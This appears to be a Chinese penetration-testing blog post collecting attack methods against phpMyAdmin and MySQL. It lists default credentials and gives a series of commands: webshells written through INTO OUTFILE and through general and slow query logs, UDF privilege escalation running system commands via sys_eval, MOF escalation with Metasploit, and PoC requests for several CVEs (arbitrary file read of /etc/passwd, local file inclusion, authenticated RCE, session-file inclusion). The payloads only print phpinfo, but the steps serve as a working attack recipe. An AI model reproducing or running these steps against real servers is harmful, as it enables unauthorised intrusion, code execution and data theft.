关于phpmyadmin的利用方式大佬们已经总结的很好了,这里只是造轮子(便于记录学习)

确认版本

渗透测试信息搜集永远是首位(也是最重要的一步).
 

默认目录/doc/html/index.html

phpmyadmin漏洞利用

大多数的漏洞利用方式都为登录后利用,需要进入后台才可以进行利用。常见密码为root:root root:(空格) mysql:mysql
 
常见的GetShell方式

  • 直接写Shell

    使用条件
     
    当前用户有写入权限

    知道web目录绝对路径

    web路径可写
     
    执行show variables like 'secure_file_priv';若是secure_file_priv一栏是空(如果是NULL的话就代表不允许导入导出)的那么就代表任意位置有写入webshell的权限,否者则为指定的路径(此项在mysql.ini中进行修改)。

     
    猜测web目录的绝对路径
     
    执行show variables like '%datadir%';根据数据库的默认存储位置来猜测web目录绝对路径。
     

     
    是phpstudy的话猜测web目录应该为c:\phpStudy\PHPTutorial\www\
     
    直接写shell
     
    执行select '<?php phpinfo();?>' into outfile 'c:\\phpStudy\\PHPTutorial\\www\\pppp.php';

  • 通过开启日志功能来进行GetShell

    使用条件

    必须为root用户

    • 开启日志记录

      set global general_log = "ON";

    • 指定日志文件

      set global general_log_file = "C:/phpStudy/PHPTutorial/WWW/.404.php";

    • 写入执行代码

      select "<?php phpinfo();?>";

  • 设置慢查询日志记录(如名就是一些操作慢的查询会被写入日志)

    • 查询慢查询日志的位置

      show variables like '%slow%';

    • 重新设置慢查询日志路径

      set GLOBAL slow_query_log_file='C:/phpStudy/PHPTutorial/WWW/pppp.php';

    • 开启慢查询日志

      set GLOBAL slow_query_log=on;

    • 执行慢查询写入日志

      select '<?php phpinfo();?>' from mysql.db where sleep(10);
       

      UDF提权(用户自定义函数)

  • 利用条件

    需要具备写权限+插件目录可写(或者可以更改指定的插件目录),具体情况要看目标mysql的版本。

    1. 在mysql>5.1时,dll或者so必须位于mysql安装目录下的lib\plugin下,当对此目录有写权限的时候可以利用.
       
      查询插件目录show variables like '%plugin%';

    2. 5.0<=mysql version<5.1时,需要导出至目标服务器的系统目录C:\\Windows\\System32.

    3. version < 5.0时,目录可以自定义.

    写入dll
     
    select 'xxx' into dumpfile 'c:\\\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin\\lib_mysqludf_sys.dll'
     
    创建函数
     
    create function sys_eval returns string soname "lib_mysqludf_sys.dll";
     
    执行命令
     
    select * from mysql.func where name = 'sys_eval';查看创建的函数
     
    select sys_eval('whoami');执行命令

    MOF提权

    通过mysql将文件写入一个MOF文件替换掉原有的MOF文件,然后系统每隔五秒就会执行一次上传的MOF。一般适用于Windows <= 2003,并且C:\Windows\System32\mof目录具有写权限(一般是没有权限写)。可以使用MSF直接利用:

se exploit/windows/mysql/mysql_mof
setrhost 192.168.1.5
setrport 3306
setpasswordroot
setusername root
exploit

phpmyadmin的一些其他漏洞

WooYun-2016-199433:任意文件读取漏洞(phpMyAdmin2.x)

POST /scripts/setup.php HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 80 action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}

CVE-2014-8959:本地文件包含(影响范围:phpMyAdmin 4.0.1--4.2.12,需要PHP version < 5.3.4 ,Poc如下:)

/gis_data_editor.php?token=2941949d3768c57b4342d94ace606e91&gis_data[gis_type]=/../../../../phpinfo.txt%00  # 注意改下token值

CVE-2016-5734:后台RCE(影响范围:PhpMyAdmin 4.0.x-4.6.2,需要PHP 4.3.0-5.4.6 versions,利用如下:)

cve-2016-5734.py -u root --pwd="" http://localhost/pma -c "system('ls -lua');"

CVE-2018-1261:后台文件包含(phpMyAdmin 4.8.0和4.8.1,经过验证可实现任意文件包含。利用如下:)

执行sql语句,将PHP代码写入Session文件中:select '<?php phpinfo();exit;?>';

包含session文件
 
http://10.1.1.10/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_*** # *** 为phpMyAdmin的COOKIE值

CVE-2018-19968:任意文件包含/RCE(phpMyAdmin 4.8.0~4.8.3)

  1. 创建数据库,并将PHP代码写入Session文件中

    CREATE DATABASE foo;
    CREATE TABLE foo.bar (baz VARCHAR(100) PRIMARY KEY );
    INSERT INTO foo.bar SELECT '<?php phpinfo(); ?>';
  2. 生成foo数据库的phpMyAdmin的配置表,访问

    http://10.1.1.10/chk_rel.php?fixall_pmadb=1&db=foo

  3. 篡改数据插入pma__column_info中:

    http://10.1.1.10/tbl_replace.php?db=foo&table=bar&where_clause=1=1&fields_name[multi_edit][][]=baz&clause_is_unique=1

  4. 访问包含session文件地址

    http://10.1.1.10/tbl_replace.php?db=foo&table=bar&where_clause=1=1&fields_name[multi_edit][][]=baz&clause_is_unique=1

后记

前面关于phpmyadmin的渗透都是根据大佬的博客来总结出来的,后面的话就来讲一下不同版本mysql的一些特性吧.

  1. 在mysql5.0之后才引入的information_schema系统数据库,也就是说在mysql5.0以后才可以使用盲注、联和查询。
  2. 在mysql5.6以上的版本中,系统Mysql库中存在两张与innodb相关的表 innodb_table_stats 和 innodb_index_stats

如图可以查询到数据库.
 

记得还有mysql多少版本才可以使用联和查询来着(忘了23333).

参考博客

t3ngyu师傅

大部分的东西都是借鉴t3ngyu师傅的

phpmyadmin利用的多种方式的更多相关文章

  1. idea打包jar的多种方式

    这里总结出用IDEA打包jar包的多种方式,以后的项目打包Jar包可以参考如下形式: 用IDEA自带的打包形式 用Maven插件maven-shade-plugin打包 用Maven插件maven-a ...

  2. JavaScript中判断为整数的多种方式

    之前记录过JavaScript中判断为数字类型的多种方式,这篇看看如何判断为整数类型(Integer). JavaScript中不区分整数和浮点数,所有数字内部都采用64位浮点格式表示,和Java的d ...

  3. intelliJ 打包jar的多种方式

    这里总结出用IntelliJ IDEA打包jar包的多种方式,以后的项目打包Jar包可以参考如下形式: 用IDEA自带的打包形式 用Maven插件maven-shade-plugin打包 用Maven ...

  4. idea打包jar的多种方式,用IDEA自带的打包形式,用IDEA自带的打包形式 用Maven插件maven-shade-plugin打包,用Maven插件maven-assembly-plugin打包

    这里总结出用IDEA打包jar包的多种方式,以后的项目打包Jar包可以参考如下形式: 用IDEA自带的打包形式 用Maven插件maven-shade-plugin打包 用Maven插件maven-a ...

  5. 特性attribute,声明和使用attribute,应用attribute,AOP面向切面,多种方式实现AOP

    1 特性attribute,和注释有什么区别2 声明和使用attribute3 应用attribute4 AOP面向切面5 多种方式实现AOP ---------------------------- ...

  6. Intellij IDEA 打包jar的多种方式

    IDEA打包jar包的多种方式 用IDEA自带的打包形式 用Maven插件maven-shade-plugin打包 用Maven插件maven-assembly-plugin打包 1.view-> ...

  7. 云小课 | 搬迁本地数据至OBS,多种方式任你选

    摘要:搬迁本地数据至OBS,包括OBS工具方式.CDM方式.DES磁盘方式.DES Teleport方式和云专线方式,每种方式特点不同,本节课我们就一起看看有什么区别. 已有的业务数据可能保存在本地的 ...

  8. Java中测试异常的多种方式

    使用JUnit来测试Java代码中的异常有很多种方式,你知道几种? 给定这样一个class. Person.java 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 ...

  9. Spring学习总结(一)——Spring实现IoC的多种方式

    控制反转IoC(Inversion of Control),是一种设计思想,DI(依赖注入)是实现IoC的一种方法,也有人认为DI只是IoC的另一种说法.没有IoC的程序中我们使用面向对象编程对象的创 ...

随机推荐

  1. hdu 5885 XM Reserves (FFT建模)

    Problem Description As an eligible Ingress Resistance Agent you should know your power source, the E ...

  2. ios和android适配

    一些情况下对非可点击元素如(label,span)监听click事件,ios下不会触发 解决方案:css增加cursor:pointer; 三星手机遮罩层下的input.select.a等元素可以被点 ...

  3. vi 编辑器使用指南

    一.Unix编辑器概述编辑器是使用计算机的重要工具之一,在各种操作系统中,编辑器都是必不可少的部件.Unix及其相似的ix操作系统系列中,为方便各种用户在各个不同的环境中使用,提供了一系列的ex编辑器 ...

  4. python基础-包和模块

    Python基础-包与模块 写在前面 如非特别说明,下文均基于Python3 摘要 为重用以及更好的维护代码,Python使用了模块与包:一个Python文件就是一个模块,包是组织模块的特殊目录(包含 ...

  5. web开发小知识

    session共享机制:f5刷新是再次提交之前的数据请求 地址栏回车属于不同的请求 不同浏览器获取不到之前数据 同一浏览器可以获取同步数据 session注销:session.invalidate() ...

  6. mybatis plus CRUD

    首先我们的项目建立之后我们要建立一个实体类来对应我们的数据裤中的信息 employee import com.baomidou.mybatisplus.annotation.IdType; impor ...

  7. 执行sudo apt-get update报错

    1.在官网源https://mirrors.ustc.edu.cn/repogen/下载对应版本最新的源,比如我是16.04版本的ubuntu,对应下载的是这个 2.下载sources.list完成之 ...

  8. NOI 2018 Day1 T1 归程

    题面见洛谷 难点:  走过有积水的地方之后就需计算路径长了 关键算法:   kruskal重构树 ①原来的 kruskalkruskalkruskal 算法就是用并查集实现的, 但当我们使用 krus ...

  9. Python安装和使用教程(windows)

    点击进入幕布视图浏览 https://mubu.com/doc/a8VGCUfqqw 一.Python下载 1.进入Python官网:https://www.python.org/ 2.选择windo ...

  10. 19-python基础-进制之间的转换

    二进制-八进制-十进制-十六进制相互转换 1.十进制转为其他进制 # (1)十进制转二进制 a = 8 bin(a) --->>'0b1000' # (2)十进制转八进制 oct(a) - ...